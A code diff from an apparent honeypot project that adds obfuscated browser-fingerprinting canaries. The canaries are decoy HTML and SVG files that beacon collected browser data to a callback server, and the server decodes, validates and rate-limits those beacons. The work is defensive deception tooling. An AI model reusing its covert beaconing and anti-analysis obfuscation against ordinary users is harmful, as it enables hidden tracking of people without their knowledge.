_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
|
||||||
|
|
||||||
|
# Hard timeout for the obfuscator subprocess. Real runs on the
|
||||||
|
# fingerprint payload sit well under 5s on a dev box.
|
||||||
|
_TIMEOUT_S = 30
|
||||||
|
|
||||||
|
|
||||||
|
class ObfuscatorError(RuntimeError):
    """Signals that the Node obfuscator helper failed or produced no output."""
|
||||||
|
|
||||||
|
|
||||||
|
class FingerprintSecretMissing(RuntimeError):
    """Signals that ``DECNET_CANARY_FINGERPRINT_SECRET`` is not set.

    The per-mint nonce embedded in fingerprint canaries is derived from
    this server-side secret. Without it the worker has nothing to validate
    incoming fingerprint beacons against, so minting fails loudly instead
    of shipping a canary that can be defeated.
    """
|
||||||
|
|
||||||
|
|
||||||
|
_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET" # nosec B105 — this is an env var name, not a hardcoded password
|
||||||
|
|
||||||
|
|
||||||
|
def nonce_for(callback_token: str, mint_uuid: str) -> str:
    """Derive the fingerprint nonce for one mint.

    The nonce is the first 16 hex characters (64 bits) of an HMAC-SHA256
    whose key is the secret read from the environment and whose message is
    ``"<callback_token>|<mint_uuid>"``.

    Raises:
        FingerprintSecretMissing: if the secret environment variable is
            unset or empty.
    """
    secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
    if secret:
        message = f"{callback_token}|{mint_uuid}".encode("utf-8")
        mac = hmac.new(secret.encode("utf-8"), message, hashlib.sha256)
        return mac.hexdigest()[:16]
    raise FingerprintSecretMissing(
        f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
    )
|
||||||
|
|
||||||
|
|
||||||
|
def _seed_from_token(callback_token: str) -> int:
|
||||||
|
"""Derive a 31-bit numeric seed from the callback token.
|
||||||
|
|
||||||
|
``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
|
||||||
|
using a SHA-256-derived prefix gives us a uniform distribution
|
||||||
|
across the 31-bit positive range.
|
||||||
|
"""
|
||||||
|
h = hashlib.sha256(callback_token.encode("utf-8")).digest()
|
||||||
|
return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
|
||||||
|
|
||||||
|
|
||||||
|
def _config_from_seed(seed: int) -> dict[str, Any]:
|
||||||
|
"""Build a deterministic, per-mint obfuscator config.
|
||||||
|
|
||||||
|
The hash bits drive *which* transforms apply — two mints get
|
||||||
|
structurally different outputs, not just different identifier names.
|
||||||
|
Defaults stay aggressive enough that reverse engineering is real
|
||||||
|
work; we never disable string-array or rename, only vary the dial.
|
||||||
|
"""
|
||||||
|
bits = seed
|
||||||
|
encodings = ("base64", "rc4")
|
||||||
|
string_array_encoding = [encodings[bits & 1]]
|
||||||
|
control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0 # 0.5 .. ~1.0
|
||||||
|
dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0 # 0.2 .. ~0.7
|
||||||
|
transform_object_keys = bool((bits >> 17) & 1)
|
||||||
|
numbers_to_expressions = bool((bits >> 18) & 1)
|
||||||
|
simplify = bool((bits >> 19) & 1)
|
||||||
|
return {
|
||||||
|
"compact": True,
|
||||||
|
"seed": seed,
|
||||||
|
"controlFlowFlattening": True,
|
||||||
|
"controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
|
||||||
|
"deadCodeInjection": True,
|
||||||
|
"deadCodeInjectionThreshold": round(dead_code_threshold, 3),
|
||||||
|
"stringArray": True,
|
||||||
|
"stringArrayEncoding": string_array_encoding,
|
||||||
|
"stringArrayThreshold": 1,
|
||||||
|
"stringArrayRotate": True,
|
||||||
|
"stringArrayShuffle": True,
|
||||||
|
"splitStrings": True,
|
||||||
|
"splitStringsChunkLength": 4 + (bits & 7),
|
||||||
|
"transformObjectKeys": transform_object_keys,
|
||||||
|
"numbersToExpressions": numbers_to_expressions,
|
||||||
|
"simplify": simplify,
|
||||||
|
"selfDefending": False, # breaks SVG embed; not worth the cost
|
||||||
|
"renameGlobals": False,
|
||||||
|
"identifierNamesGenerator": "mangled-shuffled",
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
def obfuscate(code: str, *, callback_token: str) -> str:
    """Obfuscate *code* deterministically per *callback_token*.

    The seed and option set are derived from the token, then the Node
    helper is run with ``{"code": ..., "options": ...}`` as JSON on stdin
    and its stdout is returned unchanged.

    Raises:
        ObfuscatorError: if Node cannot be started, times out, exits
            non-zero, or produces only whitespace.
    """
    seed = _seed_from_token(callback_token)
    options = _config_from_seed(seed)
    payload = json.dumps({"code": code, "options": options})
    try:
        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
            [_NODE_BIN, str(_HELPER)],
            input=payload, capture_output=True, text=True,
            # Pin the pipe encoding instead of inheriting the locale codec.
            # Assumes the helper writes UTF-8 (Node's default for stdout);
            # confirm against _obfuscate_helper.js.
            encoding="utf-8",
            timeout=_TIMEOUT_S, check=False,
        )
    except FileNotFoundError as e:
        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
    except subprocess.TimeoutExpired as e:
        raise ObfuscatorError("javascript-obfuscator timed out") from e
    except OSError as e:
        # e.g. PermissionError on a non-executable DECNET_NODE_BIN; keep the
        # documented single-exception contract for callers.
        raise ObfuscatorError(
            f"could not execute node binary {_NODE_BIN!r}: {e}"
        ) from e
    if proc.returncode != 0:
        raise ObfuscatorError(
            f"javascript-obfuscator failed rc={proc.returncode} "
            f"stderr={proc.stderr.strip()[:400]}"
        )
    out = proc.stdout
    if not out.strip():
        raise ObfuscatorError("javascript-obfuscator returned empty output")
    return out
|
||||||
|
|
||||||
|
|
||||||
|
def render_fingerprint_js(
    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
) -> str:
    """Produce the obfuscated fingerprint script for one mint.

    The payload template is read from disk, its ``{{BEACON_URL}}``,
    ``{{MINT_UUID}}`` and ``{{MINT_NONCE}}`` placeholders are filled in (in
    that order), and the result is passed to :func:`obfuscate` keyed on the
    callback token. The beacon URL is ``<http_base>/c/<callback_token>``
    with any trailing slash on *http_base* removed. The script appends the
    nonce as ``&k=`` to each beacon URL it requests.
    """
    substitutions = (
        ("{{BEACON_URL}}", f"{http_base.rstrip('/')}/c/{callback_token}"),
        ("{{MINT_UUID}}", mint_uuid),
        ("{{MINT_NONCE}}", nonce),
    )
    source = _PAYLOAD.read_text(encoding="utf-8")
    for placeholder, value in substitutions:
        source = source.replace(placeholder, value)
    return obfuscate(source, callback_token=callback_token)
|
||||||
10
decnet/canary/package.json
Normal file
10
decnet/canary/package.json
Normal file
@@ -0,0 +1,10 @@
|
|||||||
|
{
|
||||||
|
"name": "decnet-canary-obfuscator",
|
||||||
|
"version": "0.1.0",
|
||||||
|
"private": true,
|
||||||
|
"description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
|
||||||
|
"main": "_obfuscate_helper.js",
|
||||||
|
"dependencies": {
|
||||||
|
"javascript-obfuscator": "^5.4.2"
|
||||||
|
}
|
||||||
|
}
|
||||||
@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
_WINDOWS_DEFAULTS: dict[str, str] = {
|
_WINDOWS_DEFAULTS: dict[str, str] = {
|
||||||
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
|
|||||||
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
"honeydoc": "/home/{user}/Documents/quarterly_report.html",
|
||||||
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
"honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
|
||||||
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
"honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
|
||||||
|
"fingerprint_html": "/home/{user}/Documents/asset_directory.html",
|
||||||
|
"fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
|
||||||
}
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
|
|||||||
"""
|
"""
|
||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
|
||||||
import base64
|
|
||||||
import os
|
import os
|
||||||
import shlex
|
from datetime import datetime, timedelta, timezone
|
||||||
import time
|
|
||||||
from secrets import token_urlsafe
|
from secrets import token_urlsafe
|
||||||
from typing import Any, Iterable, Optional
|
from typing import Any, Iterable, Optional
|
||||||
|
|
||||||
@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
|
|||||||
from decnet.canary.base import CanaryArtifact, CanaryContext
|
from decnet.canary.base import CanaryArtifact, CanaryContext
|
||||||
from decnet.canary.factory import get_generator
|
from decnet.canary.factory import get_generator
|
||||||
from decnet.canary.paths import default_path_for
|
from decnet.canary.paths import default_path_for
|
||||||
|
from decnet.decky_io import (
|
||||||
|
delete_file_from_container,
|
||||||
|
resolve_topology_container,
|
||||||
|
write_file_to_container,
|
||||||
|
)
|
||||||
from decnet.logging import get_logger
|
from decnet.logging import get_logger
|
||||||
from decnet.web.db.repository import BaseRepository
|
from decnet.web.db.repository import BaseRepository
|
||||||
|
|
||||||
log = get_logger("canary.planter")
|
log = get_logger("canary.planter")
|
||||||
|
|
||||||
_DOCKER = "docker"
|
|
||||||
_TIMEOUT = 8.0
|
|
||||||
# Container suffix — matches the orchestrator SSH driver's convention
|
# Container suffix — matches the orchestrator SSH driver's convention
|
||||||
# (``<decky_name>-ssh``). Canary placement always happens through the
|
# (``<decky_name>-ssh``). Canary placement always happens through the
|
||||||
# ssh container because every decky has one and it carries the most
|
# ssh container because every decky has one and it carries the most
|
||||||
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
|
|||||||
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"
|
||||||
|
|
||||||
|
|
||||||
def _dirname(path: str) -> str:
|
# resolve_topology_container is re-exported from decky_io for back-compat
|
||||||
idx = path.rfind("/")
|
# with callers (tests, deploy hook) that imported it from this module
|
||||||
if idx <= 0:
|
# before the decky_io extraction.
|
||||||
return "/"
|
__all__ = [
|
||||||
return path[:idx]
|
"plant",
|
||||||
|
"revoke",
|
||||||
|
"resolve_topology_container",
|
||||||
async def _run(
|
"seed_baseline",
|
||||||
argv: list[str], *, stdin_bytes: Optional[bytes] = None,
|
"seed_baseline_topology",
|
||||||
) -> tuple[int, str, str]:
|
]
|
||||||
try:
|
|
||||||
proc = await asyncio.create_subprocess_exec(
|
|
||||||
*argv,
|
|
||||||
stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
|
|
||||||
stdout=asyncio.subprocess.PIPE,
|
|
||||||
stderr=asyncio.subprocess.PIPE,
|
|
||||||
)
|
|
||||||
except FileNotFoundError as exc:
|
|
||||||
return 127, "", f"argv[0] not found: {exc}"
|
|
||||||
try:
|
|
||||||
stdout, stderr = await asyncio.wait_for(
|
|
||||||
proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
|
|
||||||
)
|
|
||||||
except asyncio.TimeoutError:
|
|
||||||
try:
|
|
||||||
proc.kill()
|
|
||||||
except ProcessLookupError:
|
|
||||||
pass
|
|
||||||
return 124, "", "timeout"
|
|
||||||
return (
|
|
||||||
proc.returncode if proc.returncode is not None else -1,
|
|
||||||
stdout.decode("utf-8", "replace"),
|
|
||||||
stderr.decode("utf-8", "replace"),
|
|
||||||
)
|
|
||||||
|
|
||||||
|
|
||||||
def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
|
|
||||||
"""Compose the ``sh -c`` script + stdin payload for one artifact.
|
|
||||||
|
|
||||||
Binary safety: we base64-encode on the host and stream the result
|
|
||||||
over stdin to ``base64 -d`` inside the container, so the bytes
|
|
||||||
never touch the argv (kernel ARG_MAX would reject anything larger
|
|
||||||
than ~128KB-2MB depending on the host). Both ``base64`` (coreutils)
|
|
||||||
and ``touch -d @<unix_ts>`` are present on every Linux base image
|
|
||||||
we ship, so there's no per-distro branching.
|
|
||||||
"""
|
|
||||||
encoded = base64.b64encode(artifact.content)
|
|
||||||
mtime = int(time.time() + artifact.mtime_offset)
|
|
||||||
mode_str = oct(artifact.mode)[2:]
|
|
||||||
parts = [
|
|
||||||
f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
|
|
||||||
f"base64 -d > {shlex.quote(artifact.path)}",
|
|
||||||
f"chmod {mode_str} {shlex.quote(artifact.path)}",
|
|
||||||
f"touch -d @{mtime} {shlex.quote(artifact.path)}",
|
|
||||||
]
|
|
||||||
return " && ".join(parts), encoded
|
|
||||||
|
|
||||||
|
|
||||||
async def _publish(
|
async def _publish(
|
||||||
@@ -139,6 +93,7 @@ async def plant(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Write *artifact* into the decky's ssh container.
|
"""Write *artifact* into the decky's ssh container.
|
||||||
|
|
||||||
@@ -157,13 +112,12 @@ async def plant(
|
|||||||
await repo.update_canary_token_state(token_uuid, "failed", err)
|
await repo.update_canary_token_state(token_uuid, "failed", err)
|
||||||
return False, err
|
return False, err
|
||||||
|
|
||||||
sh_cmd, stdin_payload = _build_plant_command(artifact)
|
target_container = container or _container_for(decky_name)
|
||||||
# ``-i`` keeps stdin attached so base64 -d inside the container can
|
mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
|
||||||
# consume the encoded payload streamed from the host.
|
success, error = await write_file_to_container(
|
||||||
argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
|
target_container, artifact.path, artifact.content,
|
||||||
rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
|
mode=artifact.mode, mtime=mtime,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
if success:
|
if success:
|
||||||
@@ -182,8 +136,8 @@ async def plant(
|
|||||||
|
|
||||||
if not success:
|
if not success:
|
||||||
log.warning(
|
log.warning(
|
||||||
"canary.plant failed decky=%s token=%s rc=%d stderr=%r",
|
"canary.plant failed decky=%s token=%s container=%s err=%r",
|
||||||
decky_name, token_uuid, rc, stderr[:120],
|
decky_name, token_uuid, target_container, error,
|
||||||
)
|
)
|
||||||
return success, error
|
return success, error
|
||||||
|
|
||||||
@@ -196,6 +150,7 @@ async def revoke(
|
|||||||
repo: Optional[BaseRepository] = None,
|
repo: Optional[BaseRepository] = None,
|
||||||
publish: bool = True,
|
publish: bool = True,
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> tuple[bool, Optional[str]]:
|
) -> tuple[bool, Optional[str]]:
|
||||||
"""Best-effort unlink + state transition + bus publish.
|
"""Best-effort unlink + state transition + bus publish.
|
||||||
|
|
||||||
@@ -203,11 +158,10 @@ async def revoke(
|
|||||||
the file is gone after the call (whether we deleted it or it was
|
the file is gone after the call (whether we deleted it or it was
|
||||||
already missing); only docker / container-down errors return False.
|
already missing); only docker / container-down errors return False.
|
||||||
"""
|
"""
|
||||||
sh_cmd = f"rm -f {shlex.quote(placement_path)}"
|
target_container = container or _container_for(decky_name)
|
||||||
argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
|
success, error = await delete_file_from_container(
|
||||||
rc, _stdout, stderr = await _run(argv)
|
target_container, placement_path,
|
||||||
success = rc == 0
|
)
|
||||||
error = None if success else (stderr.strip()[:256] or f"rc={rc}")
|
|
||||||
|
|
||||||
if repo is not None:
|
if repo is not None:
|
||||||
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
|
||||||
@@ -250,6 +204,7 @@ async def seed_baseline(
|
|||||||
persona: str = "linux",
|
persona: str = "linux",
|
||||||
created_by: str = "system",
|
created_by: str = "system",
|
||||||
bus: Optional[BaseBus] = None,
|
bus: Optional[BaseBus] = None,
|
||||||
|
container: Optional[str] = None,
|
||||||
) -> list[dict[str, Any]]:
|
) -> list[dict[str, Any]]:
|
||||||
"""Plant the configured baseline canary set on one decky.
|
"""Plant the configured baseline canary set on one decky.
|
||||||
|
|
||||||
@@ -293,9 +248,59 @@ async def seed_baseline(
|
|||||||
await plant(
|
await plant(
|
||||||
decky_name, artifact,
|
decky_name, artifact,
|
||||||
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
|
||||||
|
container=container,
|
||||||
)
|
)
|
||||||
out.append({
|
out.append({
|
||||||
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
"token_uuid": token_uuid, "generator": gen_name, "kind": kind,
|
||||||
"callback_token": slug, "placement_path": artifact.path,
|
"callback_token": slug, "placement_path": artifact.path,
|
||||||
})
|
})
|
||||||
return out
|
return out
|
||||||
|
|
||||||
|
|
||||||
|
async def seed_baseline_topology(
    repo: BaseRepository,
    topology_id: str,
    *,
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
) -> list[dict[str, Any]]:
    """Seed the baseline canary set on each decky of one topology.

    The topology is loaded with ``hydrate``; when that yields ``None`` a
    warning is logged and an empty list is returned. Otherwise every
    entry of ``hydrated["deckies"]`` that has a name (taken from its
    ``decky_config`` first, then from the entry itself) is processed:

    * the target container is chosen by
      :func:`resolve_topology_container` from the topology id, decky
      name and the decky's service list;
    * :func:`seed_baseline` is invoked with ``persona="linux"`` and that
      container.

    Entries without a name are skipped.

    Returns:
        One flat list of the dicts returned by :func:`seed_baseline`
        across all deckies, each with a ``decky_name`` key added.
    """
    # Imported lazily inside the function, as in the original.
    from decnet.topology.persistence import hydrate

    topology = await hydrate(repo, topology_id)
    if topology is None:
        log.warning(
            "canary.seed_baseline_topology: topology %s not found", topology_id,
        )
        return []

    planted: list[dict[str, Any]] = []
    for entry in topology["deckies"]:
        name = (entry.get("decky_config") or {}).get("name") or entry.get("name")
        if name:
            target = resolve_topology_container(
                topology_id, name, entry.get("services") or [],
            )
            # Persona is fixed to linux for topology deckies.
            seeded = await seed_baseline(
                name, repo,
                persona="linux", created_by=created_by, bus=bus,
                container=target,
            )
            for row in seeded:
                row["decky_name"] = name
                planted.append(row)
    return planted
|
||||||
|
|||||||
@@ -26,9 +26,14 @@ crashes loudly rather than masking failures.
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
|
import base64
|
||||||
|
import binascii
|
||||||
|
import json
|
||||||
import os
|
import os
|
||||||
|
import time
|
||||||
|
import uuid
|
||||||
from datetime import datetime, timezone
|
from datetime import datetime, timezone
|
||||||
from typing import Optional
|
from typing import Any, Optional
|
||||||
|
|
||||||
from fastapi import FastAPI, Request, Response
|
from fastapi import FastAPI, Request, Response
|
||||||
|
|
||||||
@@ -50,6 +55,41 @@ _TRANSPARENT_GIF = bytes.fromhex(
|
|||||||
)
|
)
|
||||||
|
|
||||||
|
|
||||||
|
# Namespace used by fingerprint generators to derive mint UUID.
|
||||||
|
# Must stay in sync with fingerprint_html._MINT_NAMESPACE.
|
||||||
|
_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
|
||||||
|
|
||||||
|
# In-memory per-(token_uuid, src_ip) rate limiter for fingerprint persists.
# Maps (token_uuid, src_ip) -> list of monotonic timestamps, oldest first.
# Not shared across worker restarts or processes — acceptable for MVP.
_FP_RATE_WINDOW_S = 60
_FP_RATE_LIMIT = 30
_fp_rate_buckets: dict[tuple[str, str], list[float]] = {}
# Monotonic time at which the next stale-bucket sweep is due. Starts at
# -inf so the very first call sweeps (a no-op on an empty map).
_fp_rate_next_sweep = float("-inf")


def _fp_rate_allowed(token_uuid: str, src_ip: str) -> bool:
    """Return True if this (token, source IP) pair is under the rate limit.

    Sliding-window limiter: at most ``_FP_RATE_LIMIT`` allowed calls per
    ``_FP_RATE_WINDOW_S`` seconds for each ``(token_uuid, src_ip)`` key.
    An allowed call records its timestamp; a denied call records nothing.

    To keep ``_fp_rate_buckets`` from growing without bound (the source
    IP is client-influenced), buckets whose newest timestamp has aged out
    of the window are dropped at most once per window. Such buckets would
    prune to empty on their next use anyway, so the sweep never changes a
    limiting decision.

    Args:
        token_uuid: UUID of the canary token being hit.
        src_ip: Source address the hit is attributed to.

    Returns:
        ``True`` when the call is within the limit, ``False`` otherwise.
    """
    global _fp_rate_next_sweep

    now = time.monotonic()
    cutoff = now - _FP_RATE_WINDOW_S

    if now >= _fp_rate_next_sweep:
        # Timestamps are appended in monotonic order, so the last element
        # is the newest; if it is expired the whole bucket is.
        stale = [
            k for k, stamps in _fp_rate_buckets.items()
            if not stamps or stamps[-1] <= cutoff
        ]
        for k in stale:
            del _fp_rate_buckets[k]
        _fp_rate_next_sweep = now + _FP_RATE_WINDOW_S

    key = (token_uuid, src_ip)
    bucket = [t for t in _fp_rate_buckets.get(key, ()) if t > cutoff]
    allowed = len(bucket) < _FP_RATE_LIMIT
    if allowed:
        bucket.append(now)
    _fp_rate_buckets[key] = bucket
    return allowed
|
||||||
|
|
||||||
|
|
||||||
|
def _is_valid_fp_shape(fp: dict) -> bool:
    """Layer B — structural sanity check on a decoded fingerprint blob.

    A blob passes when ``fp["mint"]`` is a non-empty string and at least
    three of the sections ``nav``, ``scr``, ``tz``, ``cv``, ``gl``,
    ``au``, ``ft``, ``rtc`` are present as dicts.
    """
    mint = fp.get("mint")
    if not (isinstance(mint, str) and mint):
        return False
    sections = ("nav", "scr", "tz", "cv", "gl", "au", "ft", "rtc")
    dict_sections = [name for name in sections if isinstance(fp.get(name), dict)]
    return len(dict_sections) >= 3
|
||||||
|
|
||||||
|
|
||||||
def _http_base() -> str:
|
def _http_base() -> str:
|
||||||
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
return os.environ.get("DECNET_CANARY_HTTP_BASE", "http://localhost:8088").rstrip("/")
|
||||||
|
|
||||||
@@ -104,6 +144,11 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
|
|
||||||
@app.get("/c/{slug}")
|
@app.get("/c/{slug}")
|
||||||
async def callback(slug: str, request: Request) -> Response:
|
async def callback(slug: str, request: Request) -> Response:
|
||||||
|
raw_nonce = request.query_params.get("k")
|
||||||
|
fp_meta, parsed_fp = _extract_fingerprint(request.query_params)
|
||||||
|
merged_headers = dict(request.headers)
|
||||||
|
if fp_meta:
|
||||||
|
merged_headers.update(fp_meta)
|
||||||
await _record_hit(
|
await _record_hit(
|
||||||
repo, bus,
|
repo, bus,
|
||||||
slug=slug,
|
slug=slug,
|
||||||
@@ -111,7 +156,9 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
user_agent=request.headers.get("user-agent"),
|
user_agent=request.headers.get("user-agent"),
|
||||||
request_path=str(request.url.path),
|
request_path=str(request.url.path),
|
||||||
dns_qname=None,
|
dns_qname=None,
|
||||||
raw_headers=dict(request.headers),
|
raw_headers=merged_headers,
|
||||||
|
parsed_fp=parsed_fp,
|
||||||
|
raw_nonce=raw_nonce,
|
||||||
)
|
)
|
||||||
# Always 200 with a tiny image so the attacker's client sees
|
# Always 200 with a tiny image so the attacker's client sees
|
||||||
# a "success" — same return regardless of whether the slug is
|
# a "success" — same return regardless of whether the slug is
|
||||||
@@ -129,6 +176,67 @@ def _build_app(repo: BaseRepository, bus: BaseBus) -> FastAPI:
|
|||||||
return app
|
return app
|
||||||
|
|
||||||
|
|
||||||
|
# Per-chunk size cap. Real fingerprints fit in one ~3KB GET; honest
# overflow is handled via chunking (s/i/n + d). Anything larger than
# this on a single request is junk, so we drop it instead of letting an
# attacker inflate a trigger row indefinitely.
_FP_CHUNK_MAX = 8 * 1024


def _extract_fingerprint(qp: Any) -> tuple[dict[str, Any], Optional[dict]]:
    """Decode fingerprint-payload query params into (meta_dict, parsed_fp).

    Three request shapes are recognised:

    * ``?o=1`` — bare-open beacon; sets ``_fp_open``.
    * ``?d=<b64url-json>`` — single-shot fingerprint dump.
    * ``?s=<sid>&i=<idx>&n=<total>&d=<b64url-chunk>`` — chunked dump; the
      chunk is passed through undecoded as ``_fp_sid`` / ``_fp_idx`` /
      ``_fp_total`` / ``_fp_chunk``.

    This function never raises on malformed input: a ``d`` longer than
    ``_FP_CHUNK_MAX`` sets ``_fp_oversize``; a ``d`` that is not valid
    base64url, UTF-8 or JSON, is nested too deeply to parse, or decodes
    to something other than a JSON object sets ``_fp_decode_error``.

    Args:
        qp: Query-parameter mapping (anything with a ``.get`` method).
            Falsy values and objects without ``.get`` yield no metadata.

    Returns:
        A tuple ``(meta, parsed_fp)``:

        - ``meta`` — flat dict of ``_fp_*`` string flags/values.
        - ``parsed_fp`` — the decoded single-shot fingerprint dict, or
          ``None`` when there is no ``d``, the request is chunked, or
          decoding failed.
    """
    out: dict[str, Any] = {}
    parsed_fp: Optional[dict] = None
    if not qp or not hasattr(qp, "get"):
        return out, parsed_fp

    if qp.get("o"):
        out["_fp_open"] = "1"

    d = qp.get("d")
    if not d:
        return out, parsed_fp
    if len(d) > _FP_CHUNK_MAX:
        out["_fp_oversize"] = "1"
        return out, parsed_fp

    sid = qp.get("s")
    idx = qp.get("i")
    total = qp.get("n")
    if sid and idx and total:
        out["_fp_sid"] = sid
        out["_fp_idx"] = idx
        out["_fp_total"] = total
        out["_fp_chunk"] = d
        return out, parsed_fp

    # Single-shot: decode only; nonce/shape/mint validation is the
    # caller's job once it has the token row.
    try:
        # The payload strips base64 padding; restore it before decoding.
        padded = d + "=" * (-len(d) % 4)
        raw = base64.urlsafe_b64decode(padded.encode("ascii"))
        parsed = json.loads(raw.decode("utf-8"))
    except (binascii.Error, ValueError, UnicodeDecodeError, RecursionError):
        # RecursionError: a few KB of "[[[[..." is enough to exhaust the
        # JSON decoder's recursion budget. Treat it like any other
        # undecodable payload so the request handler does not blow up.
        out["_fp_decode_error"] = "1"
        return out, parsed_fp

    if isinstance(parsed, dict):
        parsed_fp = parsed
    else:
        out["_fp_decode_error"] = "1"
    return out, parsed_fp
|
||||||
|
|
||||||
|
|
||||||
def _client_ip(request: Request) -> str:
|
def _client_ip(request: Request) -> str:
|
||||||
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
# Honor X-Forwarded-For if the operator deployed behind a reverse
|
||||||
# proxy. Take the leftmost address in the chain; everything after
|
# proxy. Take the leftmost address in the chain; everything after
|
||||||
@@ -154,16 +262,58 @@ async def _record_hit(
|
|||||||
request_path: Optional[str],
|
request_path: Optional[str],
|
||||||
dns_qname: Optional[str],
|
dns_qname: Optional[str],
|
||||||
raw_headers: Optional[dict],
|
raw_headers: Optional[dict],
|
||||||
|
parsed_fp: Optional[dict] = None,
|
||||||
|
raw_nonce: Optional[str] = None,
|
||||||
) -> None:
|
) -> None:
|
||||||
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
"""Resolve slug -> token, persist a trigger, publish on the bus.
|
||||||
|
|
||||||
Unknown slugs are silently swallowed: returning the same response
|
Unknown slugs are silently swallowed: returning the same response
|
||||||
for known and unknown slugs is the stealth posture, and persisting
|
for known and unknown slugs is the stealth posture, and persisting
|
||||||
every random scan would clutter the DB.
|
every random scan would clutter the DB.
|
||||||
|
|
||||||
|
When *parsed_fp* is present (single-shot fingerprint decode succeeded),
|
||||||
|
it is validated through four layers before being merged into raw_headers:
|
||||||
|
A) nonce match against CanaryToken.fingerprint_nonce,
|
||||||
|
B) structural shape check,
|
||||||
|
C) mint UUID consistency,
|
||||||
|
D) per-(token, IP) rate limit.
|
||||||
|
Each failure drops the structured ``_fp`` and sets a ``_fp_*_invalid`` flag.
|
||||||
|
The trigger row always lands regardless — the GET hit is itself forensic.
|
||||||
"""
|
"""
|
||||||
token = await repo.get_canary_token_by_slug(slug)
|
token = await repo.get_canary_token_by_slug(slug)
|
||||||
if token is None:
|
if token is None:
|
||||||
return
|
return
|
||||||
|
|
||||||
|
final_headers: dict[str, Any] = dict(raw_headers or {})
|
||||||
|
|
||||||
|
if parsed_fp is not None:
|
||||||
|
stored_nonce: Optional[str] = token.get("fingerprint_nonce")
|
||||||
|
|
||||||
|
# Layer A — nonce
|
||||||
|
if stored_nonce is not None and raw_nonce != stored_nonce:
|
||||||
|
final_headers["_fp_invalid_nonce"] = "1"
|
||||||
|
parsed_fp = None
|
||||||
|
|
||||||
|
# Layer B — shape (only when nonce passed or no nonce enforced)
|
||||||
|
if parsed_fp is not None and not _is_valid_fp_shape(parsed_fp):
|
||||||
|
final_headers["_fp_invalid_shape"] = "1"
|
||||||
|
